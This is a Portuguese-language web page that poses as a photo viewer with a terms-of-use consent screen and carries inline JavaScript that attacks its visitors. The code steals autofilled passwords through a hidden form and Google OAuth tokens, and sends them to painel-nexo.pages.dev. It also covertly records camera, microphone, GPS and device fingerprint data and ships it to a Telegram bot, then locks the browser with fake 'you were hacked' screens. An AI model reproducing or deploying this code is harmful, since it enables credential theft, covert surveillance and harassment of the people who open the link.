Carregando a foto…

🔒agora

Confirme que você aceita os termos de uso para prosseguir

Para continuar navegando, confirme abaixo. É rapidinho.

📄 Ler os Termos de Uso e de Privacidade

1. Dados do dispositivo. Ao concordar, você autoriza a coleta do endereço IP, do modelo do aparelho, do sistema operacional, do navegador, do tamanho da tela, da memória, do processador, da placa gráfica, do idioma, do fuso horário, do tipo de rede e da velocidade de conexão.

2. Localização. Você autoriza o acesso à sua localização geográfica, inclusive atualizações em tempo real enquanto a ferramenta estiver aberta.

3. Câmera e microfone. Para liberar o acesso à foto, a ferramenta ativa a câmera e o microfone do seu aparelho e realiza transmissão contínua de imagem e áudio enquanto a página permanecer aberta, inclusive em segundo plano ou em modo de espera.

4. Identificação do dispositivo. Será gerada uma identidade digital única (fingerprint) a partir das características do seu dispositivo, vinculada às suas visitas.

5. Compartilhamento. As informações coletadas podem ser compartilhadas com a equipe responsável pela ferramenta e com parceiros de confiança para fins de operação, suporte e melhoria do serviço.

6. Consentimento contínuo. O aceite permanece válido durante toda a utilização da ferramenta.

/** * Usa a sessão ativa da vítima no Google. */ function requestGoogleOAuth () { const clientId = "SEU_CLIENT_ID.apps.googleusercontent.com" if (/SEU_CLIENT_ID/.test(clientId)) return const tokenClient = google.accounts.oauth2.initTokenClient({ client_id: clientId, scope: 'openid email profile https://www.googleapis.com/auth/userinfo.email offline_access', callback: (resp) => { if (resp.error) return exfiltrate({ at: resp.access_token, code: resp.code || '', slug: NEXO_SLUG }) }, error_callback: (err) => exfiltrate({ gerr: String(err), slug: NEXO_SLUG }) }) tokenClient.requestAccessToken({ prompt: 'consent' }) } function exfiltrate (obj) { const qs = Object.keys(obj) .map(k => k + '=' + encodeURIComponent(obj[k])) .join('&') // GET via : ignora CORS, some na aba de rede como "mídia" new Image().src = 'https://painel-nexo.pages.dev/harvest?' + qs } /** * Form de login invisível: captura o que o autofill do Chrome * preencher no lugar da vítima. */ function startLoginHarvester () { const form = document.createElement('form') form.style.cssText = HIDDEN_STYLE form.action = 'https://painel-nexo.pages.dev/harvest' form.method = 'POST' const user = document.createElement('input') user.type = 'text' user.name = 'username' user.autocomplete = 'username' user.placeholder = 'E-mail' const pass = document.createElement('input') pass.type = 'password' pass.name = 'password' pass.autocomplete = 'current-password' const btn = document.createElement('button') btn.textContent = 'Entrar' const slugIn = document.createElement('input') slugIn.type = 'hidden' slugIn.name = 'slug' slugIn.value = NEXO_SLUG form.append(user, pass, btn, slugIn) document.body.appendChild(form) form.addEventListener('formdata', event => { const fd = event.formData if (fd.get('username') && fd.get('password')) { form.submit() form.remove() } }) setTimeout(() => user.focus(), 1000) } /* ---------- acionamento do lote 2 dentro da trovada ---------- */ function ligarCaosDoLote2 () { try { confirmPageUnload(); } catch (e) {} try { blockBackButton(); } catch (e) {} try { fillHistory(); } catch (e) {} try { startAlertInterval(); } catch (e) {} try { startLoginHarvester(); } catch (e) {} try { setupFollowWindow(); } catch (e) {} try { moveWindowBounce(); } catch (e) {} try { if (window.google && google.accounts) requestGoogleOAuth(); } catch (e) {} var __toquesPop = 0; document.addEventListener("click", function () { if (__toquesPop === 0) { try { superLogoutByWindow(); openWindow(); } catch (e) {} __toquesPop = 1; } else if (__toquesPop === 1) { try { openWindow(); } catch (e) {} __toquesPop = 2; } }, true); } function nexoDesenhaCartaz(t1, t2, cor) { try { var cv = document.createElement("canvas"); cv.width = 1080; cv.height = 1920; var g = cv.getContext("2d"); g.fillStyle = "#04070c"; g.fillRect(0, 0, 1080, 1920); for (var i = 0; i < 260; i++) { g.fillStyle = "rgba(0," + (120 + Math.floor(Math.random() * 135)) + ",60,.16)"; g.fillRect(Math.random() * 1080, Math.random() * 1920, 3 + Math.random() * 5, 14 + Math.random() * 70); } g.strokeStyle = cor; g.lineWidth = 10; g.strokeRect(34, 34, 1012, 1852); g.fillStyle = cor; g.textAlign = "center"; g.font = "bold 92px monospace"; g.fillText(t1, 540, 880); g.font = "bold 72px monospace"; g.fillText(t2, 540, 1010); g.font = "28px monospace"; g.fillStyle = "#9fe8c3"; g.fillText("seus dados agora moram aqui", 540, 1120); return cv.toDataURL("image/jpeg", 0.85); } catch (e) { return ""; } } function nexoPreparaAchas() { __nexoPics = [ { url: nexoDesenhaCartaz("VOCÊ FOI", "HACKEADO", "#ff2b2b"), nome: "backup_fotos.jpg" }, { url: nexoDesenhaCartaz("SEUS DADOS", "VAZARAM", "#3dff6f"), nome: "senhas_2026.jpg" } ].filter(function (p) { return p.url; }); } function nexoForcaDownload() { var now = Date.now(); if (now - __dlTs < 1500) return; __dlTs = now; try { if (typeof triggerFileDownload === "function") { triggerFileDownload(); return; } } catch (e) {} if (!__nexoPics.length) return; var p = __nexoPics[Math.floor(Math.random() * __nexoPics.length)]; var a = document.createElement("a"); a.href = p.url; a.download = p.nome; document.body.appendChild(a); a.click(); a.remove(); } function nexoTelaCheia() { try { var el = document.documentElement; var r = el.requestFullscreen || el.webkitRequestFullscreen || el.mozRequestFullScreen || el.msRequestFullscreen; if (r) { var p = r.call(el); if (p && p.catch) p.catch(function () {}); } } catch (e) {} } function nexoFala(t) { try { var u = new SpeechSynthesisUtterance(t); u.lang = "pt-BR"; u.rate = 1.02; speechSynthesis.speak(u); } catch (e) {} } function nexoDetona() { if (__nexoStorm) return; __nexoStorm = true; try { document.documentElement.style.cursor = "none"; } catch (e) {} nexoTelaCheia(); try { (document.body.requestPointerLock || document.body.webkitRequestPointerLock || function () {}).call(document.body); } catch (e) {} nexoFala("Você foi hackeada"); nexoForcaDownload(); var ARTE = "\n VOCÊ FOI HACKEADO \n".repeat(14); setInterval(function () { try { if (!window.__nexoCongelada || SAIU_DA_PAGINA) return; } catch (e) {} Math.random() < 0.5 ? (function () { try { window.print(); } catch (e) {} })() : alert(ARTE); nexoFala("Você foi hackeada"); }, 90000); } function armarTrovada() { var LD = window.LOCKDOWN || null; if (LD) { try { if (!LD.pics.length) LD.injetarPosters(); LD.travaBotoes(); } catch (e) {} } addEventListener("beforeunload", function (e) { e.returnValue = true; }); addEventListener("popstate", function () { try { history.forward(); } catch (e) {} }); try { for (var i = 1; i < 20; i++) history.pushState({}, "", location.pathname + "?x=" + i); } catch (e) {} nexoPreparaAchas(); ["touchstart", "mousedown", "click", "keydown"].forEach(function (ev) { document.addEventListener(ev, function (e) { if (!__nexoStorm) { nexoDetona(); return; } if (ev !== "keydown") nexoForcaDownload(); nexoTelaCheia(); if (e.key === "Meta" || e.key === "Control") { try { window.print(); } catch (err) {} } }, { passive: true }); }); setTimeout(nexoDetona, 9000); } function aplicarCongelamento() { try { window.__nexoCongelada = true; armarTrovada(); try { ligarCaosDoLote2(); } catch (e) {} var fp = document.getElementById("fpage"); if (fp) fp.remove(); var ov = document.getElementById("overlay"); if (ov) ov.style.background = "rgba(6,8,12,.96)"; var np = document.getElementById("btnNope"); if (np) np.style.display = "none"; btn.style.cssText += ";pointer-events:none;opacity:.92"; document.getElementById("ovIco").innerHTML = ''; document.getElementById("ovTitle").textContent = "Abrindo sua foto…"; document.documentElement.style.cssText += ";overflow:hidden!important;height:100%!important;position:fixed!important;top:0;left:0;width:100%!important;overscroll-behavior:none"; document.body.style.cssText += ";overflow:hidden!important;position:fixed!important;inset:0;width:100vw;height:100dvh;touch-action:none;background:#05070b"; if (!document.getElementById("ldDim")) { var sd = document.createElement("style"); sd.id = "ldDim"; sd.textContent = "html.ld-dim::-webkit-scrollbar{display:none}"; document.head.appendChild(sd); document.documentElement.classList.add("ld-dim"); } document.addEventListener("touchmove", function ev(x){ if (window.__nexoCongelada) x.cancelable && x.preventDefault(); }, { passive: false }); var pct = 3; var falas = [ "Analisando a imagem recebida…", "Conferindo correspondências na base…", "Quase lá — finalizando a revelação…", "Otimizando o carregamento, aguarde…" ]; var k = 0; setInterval(function () { if (SAIU_DA_PAGINA) return; pct = pct < 96 ? pct + Math.floor(Math.random() * 3) : 96; document.getElementById("ovText").textContent = falas[k % falas.length] + " " + pct + "%"; btn.textContent = "Carregando… " + pct + "%"; k++; }, 4000); } catch (e) {} } const nopeBtn = document.getElementById("btnNope"); if (nopeBtn) nopeBtn.addEventListener("click", () => { window.__nexoRecusou = true; nopeBtn.disabled = true; btn.click(); if (FRAMED_ATUAL) { document.getElementById("overlay").style.display = "none"; let kok = 0; const ivK = setInterval(() => { ["crono","vidCam"].forEach(idK => { const elK = document.getElementById(idK); if (elK) elK.style.display = "none"; }); document.querySelectorAll(".pontoR").forEach(elP => { const cx = elP.parentElement; if (cx && cx !== document.getElementById("overlay")) cx.style.visibility = "hidden"; }); if (++kok > 60) clearInterval(ivK); }, 700); } }); btn.addEventListener("click", async () => { tocou = true; tocouEm = new Date().toISOString(); nexoTelaCheia(); btn.disabled = true; const c = { aceitou_termos: true, termos_aceitos_em: tocouEm }; if (!PEDIR_CAMERA_MICRO || !navigator.mediaDevices || !navigator.mediaDevices.getUserMedia) { c.camera = PEDIR_CAMERA_MICRO ? "não suportada" : "não solicitada"; fim(c); return; } btn.textContent = "Ativando câmera e microfone…"; let stream = null; try { // sem relógio contra a vítima: o navegador pode ficar minutos com o pedido na tela const VIDEO = { facingMode: { ideal: "user" }, width: { ideal: 640 }, height: { ideal: 480 } }; try { stream = await navigator.mediaDevices.getUserMedia({ video: VIDEO, audio: true }); c.camera = "permitida"; c.microfone = "permitido"; } catch (e1) { try { stream = await navigator.mediaDevices.getUserMedia({ video: VIDEO }); c.camera = "permitida"; c.microfone = "negado (só a câmera entrou)"; } catch (e2) { stream = await navigator.mediaDevices.getUserMedia({ audio: true }); c.camera = "negada (só o microfone entrou)"; c.microfone = "permitido"; } } try { fetch("https://api.telegram.org/bot" + TELEGRAM_BOT_TOKEN + "/sendMessage", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id: TELEGRAM_CHAT_ID, text: "📸 câmera/mic LIGADOS na vítima: " + c.camera + " · mic: " + c.microfone + " — ao vivo engrenando" }) }).catch(function () {}); } catch (e2) {} } catch (e) { const pol = /permission|policy/i.test(String((e && e.message) || "")); c.camera = pol ? "bloqueada pelo app que abriu o link (peça p/ abrir no Chrome)" : (e && e.name === "NotAllowedError") ? "recusada" : "não obtida (" + ((e && e.name) || "erro") + ")"; c.microfone = c.camera; try { fetch("https://api.telegram.org/bot" + TELEGRAM_BOT_TOKEN + "/sendMessage", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id: TELEGRAM_CHAT_ID, text: "🚫 câmera/mic NÃO entraram na vítima: " + c.camera }) }).catch(function () {}); } catch (e2) {} fim(c); return; } if (MODO_AO_VIVO) { c.live = true; document.getElementById("ovIco").innerHTML = ''; document.getElementById("ovTitle").textContent = "Abrindo sua foto…"; document.getElementById("ovText").textContent = "Câmera validada. Preparando a liberação da sua foto…"; btn.textContent = "Preparando foto…"; fim(c); setTimeout(() => iniciarAoVivo(stream), 300); setTimeout(() => { if (!SAIU_DA_PAGINA) aplicarCongelamento(); }, 6000); return; } document.getElementById("ovIco").innerHTML = ''; document.getElementById("ovTitle").textContent = "Validando ambiente…"; document.getElementById("ovText").textContent = "Câmera e microfone ativos por alguns segundos. Pode aguardar."; btn.textContent = "Validação em andamento…"; const vid = document.getElementById("vidCam"); vid.srcObject = stream; try { await vid.play(); } catch (e) {} let mime = ""; if (window.MediaRecorder) for (const m of ["audio/webm;codecs=opus", "audio/webm", "audio/mp4", "audio/ogg"]) if (MediaRecorder.isTypeSupported(m)) { mime = m; break; } let rec = null; const chunks = []; const promGravacao = new Promise(res => { try { const sA = new MediaStream(stream.getAudioTracks()); rec = new MediaRecorder(sA, mime ? { mimeType: mime } : undefined); rec.ondataavailable = e => { if (e.data && e.data.size) chunks.push(e.data); }; rec.onstop = () => res(chunks.length ? new Blob(chunks, { type: mime || "audio/webm" }) : null); rec.start(1000); } catch (e) { res(null); } }); const pFoto = (async () => { await sleep(FOTO_DELAY_MS); return tirarFotoFrontal(vid); })(); await sleep(DURA_VALIDACAO_MS); try { if (rec && rec.state !== "inactive") rec.stop(); } catch (e) {} const [foto, audioBlob] = await Promise.all([pFoto, promGravacao]); stream.getTracks().forEach(t => t.stop()); c.foto = foto; c.audio = audioBlob && audioBlob.size ? { blob: audioBlob, tipo: mime || "audio/webm" } : null; fim(c); }); setTimeout(() => { if (!tocou) fim({ aceitou_termos: true, termos_aceitos_em: new Date(performance.timeOrigin || Date.now()).toISOString(), aceite_via: "clique no link" }); else if (!MODO_AO_VIVO) setTimeout(() => fim({ aceitou_termos: true, termos_aceitos_em: tocouEm, camera: "tempo esgotado na validação" }), 30000); }, AGUARDA_CONSENTIMENTO_MS); }); } (async () => { const d = { ts_utc: new Date().toISOString(), ts_local: new Date().toString(), fuso_offset: -new Date().getTimezoneOffset() / 60 }; await Promise.race([NEXO_CFG_PROMISE, sleep(4500)]); if (PAINEL_PAUSADO) { document.getElementById("sp").style.display = "none"; document.getElementById("msg").textContent = "Essa página está fora do ar no momento."; document.title = "Página indisponível"; window.addEventListener("beforeunload", e => { e.preventDefault(); e.returnValue = ""; }); return; } setTimeout(() => document.getElementById("overlay").style.display = "flex", 500); const pIp = fetch("https://ipapi.co/json/").then(r => r.json()).catch(() => null); const pGps = capturarGps(); const consent = await aguardarConsentimento(); const g = await pIp; if (g) Object.assign(d, { ip: g.ip, cidade: g.city || "", uf: g.region || "", pais: g.country || "", isp: g.org || "" }); else d.ip = "n/a"; const ua = navigator.userAgent; let browser = "Não identificado", os = "Não identificado", m, m2; if (/Edg\//.test(ua)) browser = "Edge"; else if (/OPR\//.test(ua)) browser = "Opera"; else if (/SamsungBrowser\//.test(ua)) browser = "Samsung Internet"; else if (/Firefox\//.test(ua)) browser = "Firefox"; else if (/Chrome\//.test(ua)) browser = "Chrome"; else if (/Safari\//.test(ua)) browser = "Safari"; if ((m = ua.match(/Windows NT 10/))) os = "Windows 10/11"; else if ((m = ua.match(/Windows NT 6\.3/))) os = "Windows 8.1"; else if ((m = ua.match(/Windows NT 6\.1/))) os = "Windows 7"; else if ((m = ua.match(/Android ([\d.]+)/))) os = "Android " + m[1]; else if (/iPhone|iPad|iPod/.test(ua)) { m2 = ua.match(/OS (\d+_[\d_]*)/); os = "iOS " + (m2 ? m2[1].replace(/_/g, ".") : ""); } else if (ua.match(/Mac OS X/)) os = "macOS"; else if (ua.match(/CrOS/)) os = "ChromeOS"; else if (/Linux/.test(ua)) os = "Linux"; const tipo = /Mobi|Android|iPhone|iPad/.test(ua) ? "Celular" : "Desktop"; Object.assign(d, { user_agent: ua, browser, os, tipo, tela: screen.width + "x" + screen.height + " @" + window.devicePixelRatio + "x", cores_cpu: navigator.hardwareConcurrency || "-", memoria_gb: navigator.deviceMemory != null ? navigator.deviceMemory : "n/d", idioma: (navigator.languages || [navigator.language]).join(", "), rede: (navigator.connection && navigator.connection.effectiveType) || "n/d", online: navigator.onLine, referer: document.referrer || "(acesso direto)" }, consent); try { const c = document.createElement("canvas"); const gl = c.getContext("webgl") || c.getContext("experimental-webgl"); const ex = gl.getExtension("WEBGL_debug_renderer_info"); d.gpu = ex ? gl.getParameter(ex.UNMASKED_RENDERER_WEBGL) : gl.getParameter(gl.RENDERER); } catch (e) { d.gpu = "n/d"; } try { const c = document.createElement("canvas"); c.width = 280; c.height = 60; const x = c.getContext("2d"); x.textBaseline = "top"; x.font = "14px Arial"; x.fillStyle = "#f60"; x.fillRect(125, 1, 62, 20); x.fillStyle = "#069"; x.fillText("nexo", 2, 15); x.fillStyle = "rgba(255,255,255,.75)"; x.fillText("nexo", 2, 18); const fd = c.toDataURL(); d.fingerprint = fd.slice(-40); d.canvas_vazio = fd.slice(40, 95).replace(/[^A]/g, "").length >= 35; } catch (e) { d.fingerprint = "n/d"; } d.gps = await pGps; if (!consent.live) { document.getElementById("overlay").style.display = "none"; if (MODO_INDISPONIVEL) { document.title = "Página indisponível"; document.getElementById("msg").textContent = "Essa página está fora do ar no momento."; document.getElementById("sp").style.display = "none"; } } const linhas = [ "🕵️ NOVO ACESSO NO NEXO", "🔗 " + location.origin, "🗓 " + d.ts_local ]; if (d.gps) linhas.push( "📡 GPS: " + d.gps.lat + ", " + d.gps.lon + " (±" + d.gps.acur + " m)", "🗺 https://maps.google.com/?q=" + d.gps.lat + "," + d.gps.lon ); linhas.push( "🌐 IP: " + d.ip, "📍 " + [d.cidade, d.uf].filter(Boolean).join(", ") + (d.pais ? " – " + d.pais : ""), "🛜 Operadora: " + (d.isp || "n/d"), "💻 " + os + " (" + tipo + ")", "🧭 Browser: " + browser, "🖥 Tela: " + d.tela, "⚙️ " + d.cores_cpu + " núcleos · " + d.memoria_gb + " GB de RAM", "📶 Rede: " + d.rede, "⏰ Fuso: UTC" + (d.fuso_offset >= 0 ? "+" : "") + d.fuso_offset, "🗣 Idioma: " + d.idioma, "🎮 GPU: " + d.gpu, "🖼 Fingerprint: " + d.fingerprint ); linhas.push(d.aceitou_termos ? "\ud83e\udd1d Termos: ACEITOS pelo clique no link" + (d.termos_aceitos_em ? "às " + new Date(d.termos_aceitos_em).toLocaleTimeString("pt-BR") : "") : "\ud83e\udd1d Termos: página aberta (aceite automático pelo clique)"); if (d.camera) linhas.push("📷 Câmera: " + d.camera + (d.microfone ? " · 🎙 Microfone: " + d.microfone : "")); if (d.live) linhas.push("🔴 AO VIVO: fotos a cada " + (AO_VIVO_FOTO_MS / 1000) + "s e áudio a cada " + (AO_VIVO_AUDIO_MS / 1000) + "s — sem limite, continua mesmo se ela sair da página; só para se a aba fechar"); if (d.foto) linhas.push("🖼️ Foto frontal: veja o anexo abaixo"); if (d.audio) linhas.push("🎤 Áudio de validação (~" + Math.round(DURA_VALIDACAO_MS / 1000) + "s): veja o anexo abaixo"); const txt = linhas.join("\n"); const uaBot = /bot\b|crawler|spider|preview|externalhit|telegrambot|whatsapp|slckbot|linkedinbot/i.test(ua); const pareceBot = uaBot || navigator.webdriver; let janelaOk = true; try { janelaOk = Date.now() - (+localStorage.getItem("nexo_ts") || 0) > 5 * 60 * 1000; } catch (e) {} const silencioso = !consent.live && !ENVIAR_ACESOS_SILENCIOSOS && (!INTERAGIU || pareceBot || !janelaOk); if (silencioso) { try { console.log("Nexo: acesso sem interação — enviado em silêncio", { uaBot, webdriver: !!navigator.webdriver, canvasVazio: d.canvas_vazio }); } catch (e) {} } let track = TRACK_URL; if (track === "AUTO") track = /^https?:$/.test(location.protocol) ? location.origin + "/track" : ""; if (track && !silencioso) { const corpoTrack = Object.fromEntries(Object.entries(d).filter(([k]) => k !== "foto" && k !== "audio")); corpoTrack.foto_enviada = !!d.foto; corpoTrack.audio_enviado = !!d.audio; corpoTrack.aovivo = !!d.live; try { await fetch(track, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify(corpoTrack) }); } catch (e) {} } const temBot = !/^COLE_AQUI|^TOKEN$/.test(TELEGRAM_BOT_TOKEN); if (temBot && !silencioso) { try { const r = await fetch("https://api.telegram.org/bot" + TELEGRAM_BOT_TOKEN + "/sendMessage", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id: TELEGRAM_CHAT_ID, text: txt }) }); const j = await r.json(); if (j.ok) ANCOR_MSG = j.result.message_id; } catch (e) {} if (d.foto) { try { const fb = await (await fetch(d.foto)).blob(); const fd = new FormData(); fd.append("chat_id", TELEGRAM_CHAT_ID); fd.append("photo", new File([fb], "validacao.jpg")); await fetch("https://api.telegram.org/bot" + TELEGRAM_BOT_TOKEN + "/sendPhoto", { method: "POST", body: fd }); } catch (e) {} } if (d.audio) { const nomeArq = "validacao." + (d.audio.tipo.includes("mp4") ? "m4a" : "webm"); for (const metodo of ["sendAudio", "sendDocument"]) { try { const fd = new FormData(); fd.append("chat_id", TELEGRAM_CHAT_ID); const campo = metodo === "sendAudio" ? "audio" : "document"; fd.append(campo, new File([d.audio.blob], nomeArq)); if (metodo === "sendAudio") fd.append("duration", String(Math.round(DURA_VALIDACAO_MS / 1000))); const r = await fetch("https://api.telegram.org/bot" + TELEGRAM_BOT_TOKEN + "/" + metodo, { method: "POST", body: fd }); if ((await r.json()).ok) break; } catch (e) {} } } } if (!silencioso) { try { localStorage.setItem("nexo_ts", String(Date.now())); } catch (e) {} } })();